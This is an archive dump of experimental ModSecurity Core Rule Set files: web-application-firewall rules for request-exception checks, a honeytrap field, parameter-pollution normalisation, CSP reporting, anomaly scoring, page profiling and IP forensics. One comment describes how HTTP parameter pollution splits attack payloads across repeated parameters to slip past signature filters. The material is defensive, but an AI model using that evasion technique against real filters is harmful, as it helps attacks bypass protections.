# SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 0" "phase:2,id:'981085',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ENFORCEMENT" SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 1" "phase:2,id:'981086',t:none,nolog,pass,exec:/opt/modsecurity/etc/crs/lua/appsensor_request_exception_enforce.lua" # # -=[ RE2: Attempt to Invoke Unsupported HTTP Method ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE2 # SecRule REQUEST_METHOD "!@within HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT" "phase:2,id:'981087',t:none,block,msg:'Attempt to Invoke Unsupported HTTP Method.',logdata:'%{request_method}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/METHOD_NOT_ALLOWED',tag:'OWASP_AppSensor/RE2',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE2'" # # -=[ RE1: Unexpected HTTP Command ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE1 # SecRule TX:REQUEST_METHOD_VIOLATION "@eq 1" "phase:2,id:'981088',t:none,block,capture,msg:'Invalid Request Method for Resource.',logdata:'Current Request Method: %{request_method} and Allowed Request Method(s): %{resource.enforce_request_methods}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/METHOD_NOT_ALLOWED',tag:'OWASP_AppSensor/RE1',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE1'" # # -=[ RE5: Additional/Duplicated Data in Request ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5 # SecRule TX:MIN_NUM_ARGS_VIOLATION "@eq 1" "phase:2,id:'981089',t:none,block,msg:'Invalid Number of Parameters - Missing Parameter(s)',logdata:'Min Number of ARGS: %{resource.minnumofargs} and Number of ARGS Submitted: 
%{tx.num_of_args}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" SecRule TX:MAX_NUM_ARGS_VIOLATION "@eq 1" "phase:2,id:'981090',t:none,block,msg:'Invalid Number of Parameters - Additional Parameter(s)',logdata:'Max Number of ARGS: %{resource.maxnumofargs} and Number of ARGS Submitted: %{tx.num_of_args}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" SecRule TX:ARGS_NAMES_VIOLATION ".*" "phase:2,id:'981091',t:none,block,msg:'Invalid Parameter Name(s).',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" # # -=[ RE7: Unexpected Quantity of Characters in Parameter ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE7 # SecMarker BEGIN_ENFORCE_LENGTH SecRule TX:/^ARGS.*_MIN_LENGTH_VIOLATION/ ".*" "phase:2,id:'981092',t:none,block,msg:'Invalid Parameter Length - Value Is Below Normal Range',logdata:'Normal Minimum Length for Parameter (%{tx.minarglengthname}): %{tx.minarglength} and Current Length: %{matched_var}',tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE7',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecRule TX:/^ARGS.*_MAX_LENGTH_VIOLATION/ ".*" "phase:2,id:'981093',t:none,block,msg:'Invalid Parameter Length - Value Is Above Normal Range',logdata:'Normal Maximum Length for Parameter 
(%{tx.maxarglengthname}): %{tx.maxarglength} and Current Length: %{matched_var}',tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE7',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecMarker END_ENFORCE_LENGTH # # -=[ RE8: Unexpected Type of Characters in Parameter ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE8 # # # Enforce Digits Character Class # SecRule TX:/^ARGS.*_digits_violation/ ".*" "phase:2,id:'981094',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Digits.',logdata:'Parameter (%{tx.digits_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Alpha Character Class # SecRule TX:/^ARGS.*_alpha_violation/ ".*" "phase:2,id:'981095',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Letters.',logdata:'Parameter (%{tx.alpha_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce AlphaNumeric Character Class # SecRule TX:/^ARGS.*_alphanumeric_violation/ ".*" "phase:2,id:'981096',t:none,block,msg:'Invalid Character(s) in Payload - Expecting AlphNumeric.',logdata:'Parameter (%{tx.alphanumeric_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Email Character Class # SecRule TX:/^ARGS.*_email_violation/ ".*" "phase:2,id:'981097',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Email.',logdata:'Parameter (%{tx.email_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Path Character Class # SecRule TX:/^ARGS.*_path_violation/ ".*" "phase:2,id:'981103',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Path.',logdata:'Parameter 
(%{tx.path_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Url Character Class # SecRule TX:/^ARGS.*_url_violation/ ".*" "phase:2,id:'981104',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Url.',logdata:'Parameter (%{tx.url_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Flag Character Class # SecRule TX:/^ARGS.*_flag_violation/ ".*" "phase:2,id:'981110',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Flag.',logdata:'Parameter (%{tx.flag_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce SafeText Character Class # SecRule TX:/^ARGS.*_safetext_violation/ ".*" "phase:2,id:'981105',t:none,block,msg:'Invalid Character(s) in Payload - Expecting SafeText.',logdata:'Parameter (%{tx.safetext_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecMarker END_RE_PROFILE_ENFORCEMENT # # --[ Begin Profiling Phase ]-- # SecMarker BEGIN_RE_PROFILE_ANALYSIS SecAction "phase:5,id:'981098',t:none,nolog,pass,ctl:ruleEngine=DetectionOnly" SecRule RESPONSE_STATUS "^404$" "phase:5,id:'981099',t:none,nolog,pass,setvar:!resource.KEY,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule RESPONSE_STATUS "^(5|4)" "phase:5,id:'981100',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule TX:ANOMALY_SCORE "!@eq 0" "phase:5,id:'981101',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 1" "phase:2,id:'981102',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRuleScript /opt/modsecurity/etc/crs/lua/appsensor_request_exception_profile.lua "phase:5,nolog,pass" SecMarker END_RE_PROFILE_ANALYSIS 
�����modsecurity_crs_40_appsensor_detection_point_2.9_honeytrap.conf�������������������������������������0000664�0000000�0000000�00000002505�12164572564�0040770�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ HT1: Alteration to Honey Trap Data ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#HT1 # SecRule ARGS:DEBUG "!@streq false" "phase:2,id:'981131',t:none,block,msg:'Tampering of Hidden Parameter Honeytrap Data.',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'HONEYTRAP/HIDDEN_DATA_TAMPERING',tag:'OWASP_AppSensor/HT1',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#HT1'" # # Add a fake "debug" hidden parameter to forms. # # Here are some examples of parameter names/values that could be used: # # - debug=false # - debug=0 # - role=user # - role=1 # - admin=false # - admin=0 # # Make sure that your settings here match the detection rules above. 
# SecRule STREAM_OUTPUT_BODY "@rsub s/<\/form>/<input type=\"hidden\" name=\"debug\" value=\"false\"><\/form>/" "phase:4,id:'981132',t:none,nolog,pass" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_3.0_end.conf�������������������������������������������0000664�0000000�0000000�00000000643�12164572564�0037516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- SecMarker END_PROFILER_RULES ���������������������������������������������������������������������������������������������modsecurity_crs_40_http_parameter_pollution.conf����������������������������������������������������0000664�0000000�0000000�00000004200�12164572564�0036144�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # The rules in this file are considered experimental/beta rules. They attempt to address # some advanced attacks, use some new ModSecurity features or new rules language techniques. # # # HTTP Parameter Pollution (HPP) # # One HPP attack vector is to try evade signature filters by distributing the attack payload # across multiple parameters with the same name. This works as many security devices only # apply signatures to individual parameter payloads, however the back-end web application # may (in the case of ASP.NET) consolidate all of the payloads into one thus making the # attack payload active. # # -=[ Rules Logic }=- # The ruleset below is not looking for attacks directly, but rather is a crude normalization # function that mimics ASP.NET with regards to joining the payloads of parameters with the # same name. These rules will create a new TX:HPP_DATA variable that will hold this data. 
# If you have enabled PARANOID_MODE, then this variable data will also be searched against # attack filters. # # -=[ References ]=- # http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html # SecRule ARGS "^" "chain,phase:2,t:none,nolog,pass,capture,id:'900032',rev:'2.2.8',setvar:tx.%{matched_var_name}=+1" SecRule TX:/^ARGS:/ "@gt 1" "chain,t:none" SecRule MATCHED_VARS_NAMES "TX:(ARGS:.*)" "chain,capture,t:none,setvar:tx.hpp_names=%{tx.1}" SecRule ARGS ".*" "chain,t:none,capture,setvar:tx.arg_counter=+1,setvar:'tx.hppnamedata_%{tx.arg_counter}=%{matched_var_name}=%{tx.0}'" SecRule TX:/HPPNAMEDATA_/ "@contains %{tx.hpp_names}" "chain,setvar:tx.hpp_counter=+1,setvar:tx.hpp_counter_%{tx.hpp_counter}=%{matched_var}" SecRule TX:/HPP_COUNTER_/ "ARGS:(.*)?=(.*)" "capture,setvar:'tx.hpp_data=%{tx.hpp_data},%{tx.2}'" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_42_csp_enforcement.conf�0000664�0000000�0000000�00000004260�12164572564�0034261�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# -=[ Content Security Policy (CSP) Settings ]=-
#
# The purpose of these settings is to send CSP response headers to
# Mozilla FireFox users so that you can enforce how dynamic content
# is used.  CSP usage helps to prevent XSS attacks against your users.
#
# Reference Link:
#
#   https://developer.mozilla.org/en/Security/CSP
#

#
# If this is a CSP Violation Report Request, we need to enable request
# body population of the REQUEST_BODY variable.  This is not done by
# default since the request body content-type is JSON.
#
# Rule 981142 (phase 1, no log, pass): when the requested filename is exactly
# %{tx.csp_report_uri}, force ModSecurity to populate REQUEST_BODY.
# NOTE(review): tx.csp_report_uri is not set in this part of the file; it is
# presumably defined in the CRS setup configuration - confirm it is set,
# otherwise this comparison is made against an empty/unexpanded value.
#
SecRule REQUEST_FILENAME "@streq %{tx.csp_report_uri}" "phase:1,id:'981142',t:none,nolog,pass,ctl:forceRequestBodyVariable=On"

#
# Check the REQUEST_BODY for CSP Violation Report data and generate an Alert
#
# Rule 960001 (phase 2, log, pass): captures the blocked-uri value into tx.2
# and the violated-directive value into tx.3 and writes both to logdata.
#
# Things to keep in mind when consuming these alerts:
#  - The report body is supplied by the client, so blocked-uri and
#    violated-directive are untrusted text. Treat the alert as telemetry and
#    do not feed the logged values into automated actions without validation.
#  - The pattern expects the literal prefix {"csp-report": and expects
#    blocked-uri to appear before violated-directive. A report serialised with
#    different key order or spacing will not match and produces no alert.
#  - The last group is greedy, so tx.3 can extend past the directive value up
#    to a later double quote in the body.
#  - The rule is not restricted to the report URI; it inspects REQUEST_BODY of
#    any request for which that variable is populated.
#
SecRule REQUEST_BODY "({\"csp-report\":.*blocked-uri\":\"(.*?)\".*violated-directive\":\"(.*)\")" "phase:2,id:'960001',capture,t:none,log,pass,msg:'Content Security Policy (CSP) Violation',logdata:'blocked-uri:%{tx.2} violated-directive:%{tx.3}',tag:'OWASP_AppSensor/RP3',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RP3'"

#
# Check the User-Agent string for FireFox users and then set an ENV var
# to tell Apache which CSP header policy to use.
# SecRule REQUEST_HEADERS:User-Agent "(?i:mozilla.*firefox)" "phase:3,id:'960002',t:none,nolog,pass,chain" SecRule TX:CSP_REPORT_ONLY "@eq 1" "setenv:firefox_client-csp_report_only=1" SecRule REQUEST_HEADERS:User-Agent "(?i:mozilla.*firefox)" "phase:3,id:'960003',t:none,nolog,pass,chain" SecRule TX:CSP_REPORT_ONLY "@eq 0" "setenv:firefox_client-csp_enforce=1" # # Set the appropriate CSP Policy Header for FireFox clients # Header set X-Content-Security-Policy-Report-Only "%{csp_policy}e" env=firefox_client-csp_report_only Header set X-Content-Security-Policy "%{csp_policy}e" env=firefox_client-csp_enforce ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_46_scanner_integration.conf���������������������������������������������������������0000664�0000000�0000000�00000002217�12164572564�0035070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # -=[ You must be using the Resource Profiling Rules to track this data ]=- # # modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf # modsecurity_crs_40_appsensor_detection_point_3.0_end.conf # SecRule TX:/XSS-ARGS:/ ".*" "id:'999003',chain,phase:2,t:none,msg:'XSS Attack Against Known Vulnerable Parameter.',logdata:'%{matched_var}'" SecRule MATCHED_VARS_NAMES "-ARGS:(.*)$" "chain,capture" SecRule TX:1 "@within %{resource.xss_vulnerable_params}" SecRule TX:/SQL_INJECTION-ARGS:/ ".*" "id:'999004',chain,phase:2,t:none,msg:'SQLi Attack Against Known Vulnerable Parameter.',logdata:'%{matched_var}'" SecRule MATCHED_VARS_NAMES "-ARGS:(.*)$" "chain,capture" SecRule TX:1 "@within %{resource.sqli_vulnerable_params}" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_48_bayes_analysis.conf��0000664�0000000�0000000�00000002167�12164572564�0034127�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # You must edit the local path to the lua scripts # SecRule TX:'/^\\\d.*WEB_ATTACK/' ".*" "phase:2,id:'900033',t:none,log,pass,logdata:'%{tx.bayes_msg}',exec:lua/bayes_train_spam.lua" SecRuleScript lua/bayes_check_spam.lua "phase:2,id:'900034',t:none,block,msg:'Bayesian Analysis Detects Probable Attack.',logdata:'Score: %{tx.bayes_score}',severity:'2',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/BAYESIAN-%{matched_var_name}=%{tx.0}" SecRule &TX:ANOMALY_SCORE "@eq 0" "phase:5,id:'900035',t:none,log,pass,logdata:'%{tx.bayes_msg}',exec:lua/bayes_train_ham.lua" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_55_response_profiling.conf����������������������������������������������������������0000664�0000000�0000000�00000006022�12164572564�0034741�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
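#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# -=[ Response page profiling ]=-
#
# Learns how many iframes, scripts, links and images a resource normally
# returns and raises an anomaly when a later response differs. All rules run
# in phase 4 (response body).
#
# NOTE(review): the RESOURCE persistent collection is not initialised in this
# file; it is presumably set up by the AppSensor/resource profiling setup
# rules - confirm they are loaded before this file.
# NOTE(review): tx.niframes, tx.nscripts, tx.nlinks and tx.nimages are
# presumably set by profile_page_scripts.lua - confirm in the script.
#

# Run the Lua profiler for the current response.
SecRuleScript profile_page_scripts.lua "phase:4,id:'981187',t:none,nolog,pass"

#
# No baseline stored yet for this resource: record the current counts as the
# baseline and skip the rest of the profile checks.
#
# The baseline is whatever the first profiled response contains. If the page
# was already modified when it was first seen, the modified state becomes the
# reference, so review or reset the collection after a known-good deployment.
#
SecRule &RESOURCE:'/(niframes|nscripts|nlinks|nimages)/' "@eq 0" "skipAfter:END_PAGE_PROFILE,phase:4,id:'981188',t:none,nolog,pass,setvar:resource.niframes=%{tx.niframes},setvar:resource.nscripts=%{tx.nscripts},setvar:resource.nlinks=%{tx.nlinks},setvar:resource.nimages=%{tx.nimages}"

#
# Learning phase: every metric that equals the stored baseline adds 1 to the
# confidence counter (a response matching on all four metrics adds 4).
#
SecRule TX:NIFRAMES "@eq %{resource.niframes}" "phase:4,id:'981189',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"
SecRule TX:NSCRIPTS "@eq %{resource.nscripts}" "phase:4,id:'981190',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"
SecRule TX:NLINKS "@eq %{resource.nlinks}" "phase:4,id:'981191',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"
SecRule TX:NIMAGES "@eq %{resource.nimages}" "phase:4,id:'981192',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"

# Do not enforce until the confidence counter has reached 40.
SecRule RESOURCE:PROFILE_CONFIDENCE_COUNTER "@lt 40" "phase:4,id:'981193',t:none,nolog,pass,skipAfter:END_PAGE_PROFILE"

#
# Enforcement phase: alert when a count differs from the baseline.
#
# Each rule adds tx.error_anomaly_score to both tx.outbound_anomaly_score and
# tx.anomaly_score. Both setvar actions use the %{...} macro form; without the
# leading '%' the text is not expanded and the score would not be increased.
#
# NOTE(review): none of the rules in this section use 'capture', so %{tx.0}
# in the last setvar holds whatever an earlier rule captured, if anything.
#
SecRule TX:NIFRAMES "!@eq %{resource.niframes}" "phase:4,id:'981194',t:none,block,msg:'Number of IFrames in Page Have Changed.',logdata:'Previous #: %{resource.niframes} and Current #: %{tx.niframes}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"
SecRule TX:NSCRIPTS "!@eq %{resource.nscripts}" "phase:4,id:'981195',t:none,block,msg:'Number of Scripts in Page Have Changed.',logdata:'Previous #: %{resource.nscripts} and Current #: %{tx.nscripts}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"
SecRule TX:NLINKS "!@eq %{resource.nlinks}" "phase:4,id:'981196',t:none,block,msg:'Number of Links in Page Have Changed.',logdata:'Previous #: %{resource.nlinks} and Current #: %{tx.nlinks}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"
SecRule TX:NIMAGES "!@eq %{resource.nimages}" "phase:4,id:'981197',t:none,block,msg:'Number of Images in Page Have Changed.',logdata:'Previous #: %{resource.nimages} and Current #: %{tx.nimages}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"

# Jump target for the skipAfter actions above.
SecMarker END_PAGE_PROFILE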
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_56_pvi_checks.conf������0000664�0000000�0000000�00000001307�12164572564�0033231�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- SecRule &RESOURCE:OSVDB_CHECK "@eq 0" "chain,phase:5,id:'981198',t:none,nolog,pass" SecRule RESPONSE_STATUS "@streq 200" "exec:/usr/local/apache/conf/modsec_current/base_rules/osvdb.lua" SecRule TX:OSVDB_MSG "!^$" "phase:5,id:'981199',t:none,log,pass,msg:'Passive Vulnerabilty Check with OSVDB - %{matched_var}'" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_61_ip_forensics.conf����0000664�0000000�0000000�00000003730�12164572564�0033574�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Gather IP/Host Data for Audit Logging # # - http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html # # # Execute the IP Lookup/Whois Check when anomaly scores are not 0 # # You must update the local path for the exec action to point to the lua script. 
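#
# Rule 900036 (phase 5, no log): run the lookup script for any transaction
# whose anomaly score is above 0.
#
# NOTE(review): gather_ip_data.lua presumably sets tx.hostname and
# tx.abuse_contact - confirm in the script.
# The rule has no condition on ip.hostname, so the script runs for every
# flagged transaction even when a cached value exists; lookup cost therefore
# grows with the number of flagged requests.
#
SecRule TX:ANOMALY_SCORE "@gt 0" "phase:5,t:none,pass,nolog,id:'900036',exec:/usr/local/apache/conf/crs/lua/gather_ip_data.lua"

#
# Rule 900037: when TX:HOSTNAME exists, log the hostname and WHOIS abuse
# contact, cache the same text in ip.hostname for 86400 seconds (one day),
# and skip the next rule (skip:1) so the data is not logged twice.
#
# NOTE(review): the IP collection is not initialised in this file; presumably
# done by the CRS setup rules - confirm.
# A hostname obtained from a reverse lookup is chosen by whoever controls the
# client's DNS records, so treat the logged value as untrusted text in any
# tool that parses or displays these entries.
#
SecRule TX:HOSTNAME ".*" "phase:5,t:none,pass,log,id:'900037',msg:'Client Nslookup/WHOIS Abuse Info.',logdata:'Hostname: %{tx.hostname} and WHOIS Abuse Contact: %{tx.abuse_contact}',setvar:'ip.hostname=Hostname: %{tx.hostname} and WHOIS Abuse Contact: %{tx.abuse_contact}',expirevar:ip.hostname=86400,skip:1"

#
# Rule 900038: reached only when rule 900037 did not match; logs the cached
# ip.hostname value for a flagged transaction. The msg text is identical to
# rule 900037 so both entries can be found with the same log search.
#
SecRule TX:ANOMALY_SCORE "@gt 0" "phase:5,t:none,pass,log,id:'900038',msg:'Client Nslookup/WHOIS Abuse Info.',logdata:'%{ip.hostname}'"

#
# Download the GeoIP DB from MaxMind
#
# GeoLite City - http://www.maxmind.com/app/geolitecity
# GeoLite Country - http://www.maxmind.com/app/geoip_country
#
# Define the proper path to the GeoIP DB
SecGeoLookupDb /usr/local/apache/conf/modsec_current/base_rules/GeoLiteCity.dat

#
# Check the Transactional Anomaly Score - if it is not 0 then record the GeoIP data
# for the client in the audit log.
#
# Rule 900039 is a two-rule chain: the first rule tests the anomaly score and
# the chained rule performs @geoLookup on REMOTE_ADDR, which supplies the
# geo.* values written to logdata.
#
SecRule TX:ANOMALY_SCORE "@gt 0" "chain,phase:5,pass,t:none,log,id:'900039',severity:'5',msg:'Logging GeoIP Data due to anomaly score.',logdata:'Country Code=%{geo.country_code}, Country Code3=%{geo.country_code3}, Country Name=%{geo.country_name}, Country Continent=%{geo.country_continent}, City=%{geo.city}'"
    SecRule REMOTE_ADDR "@geoLookup"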
����������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/�������������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0021305�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/advanced_filter_converter.lua��������������������������0000775�0000000�0000000�00000063206�12164572564�0027223�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/lua local rex = require "rex_pcre" local B = require "bit" function main() function dec2hex(nValue) if type(nValue) == "string" then nValue = String.ToNumber(nValue); end nHexVal = string.format("%X", nValue); sHexVal = nHexVal..""; return 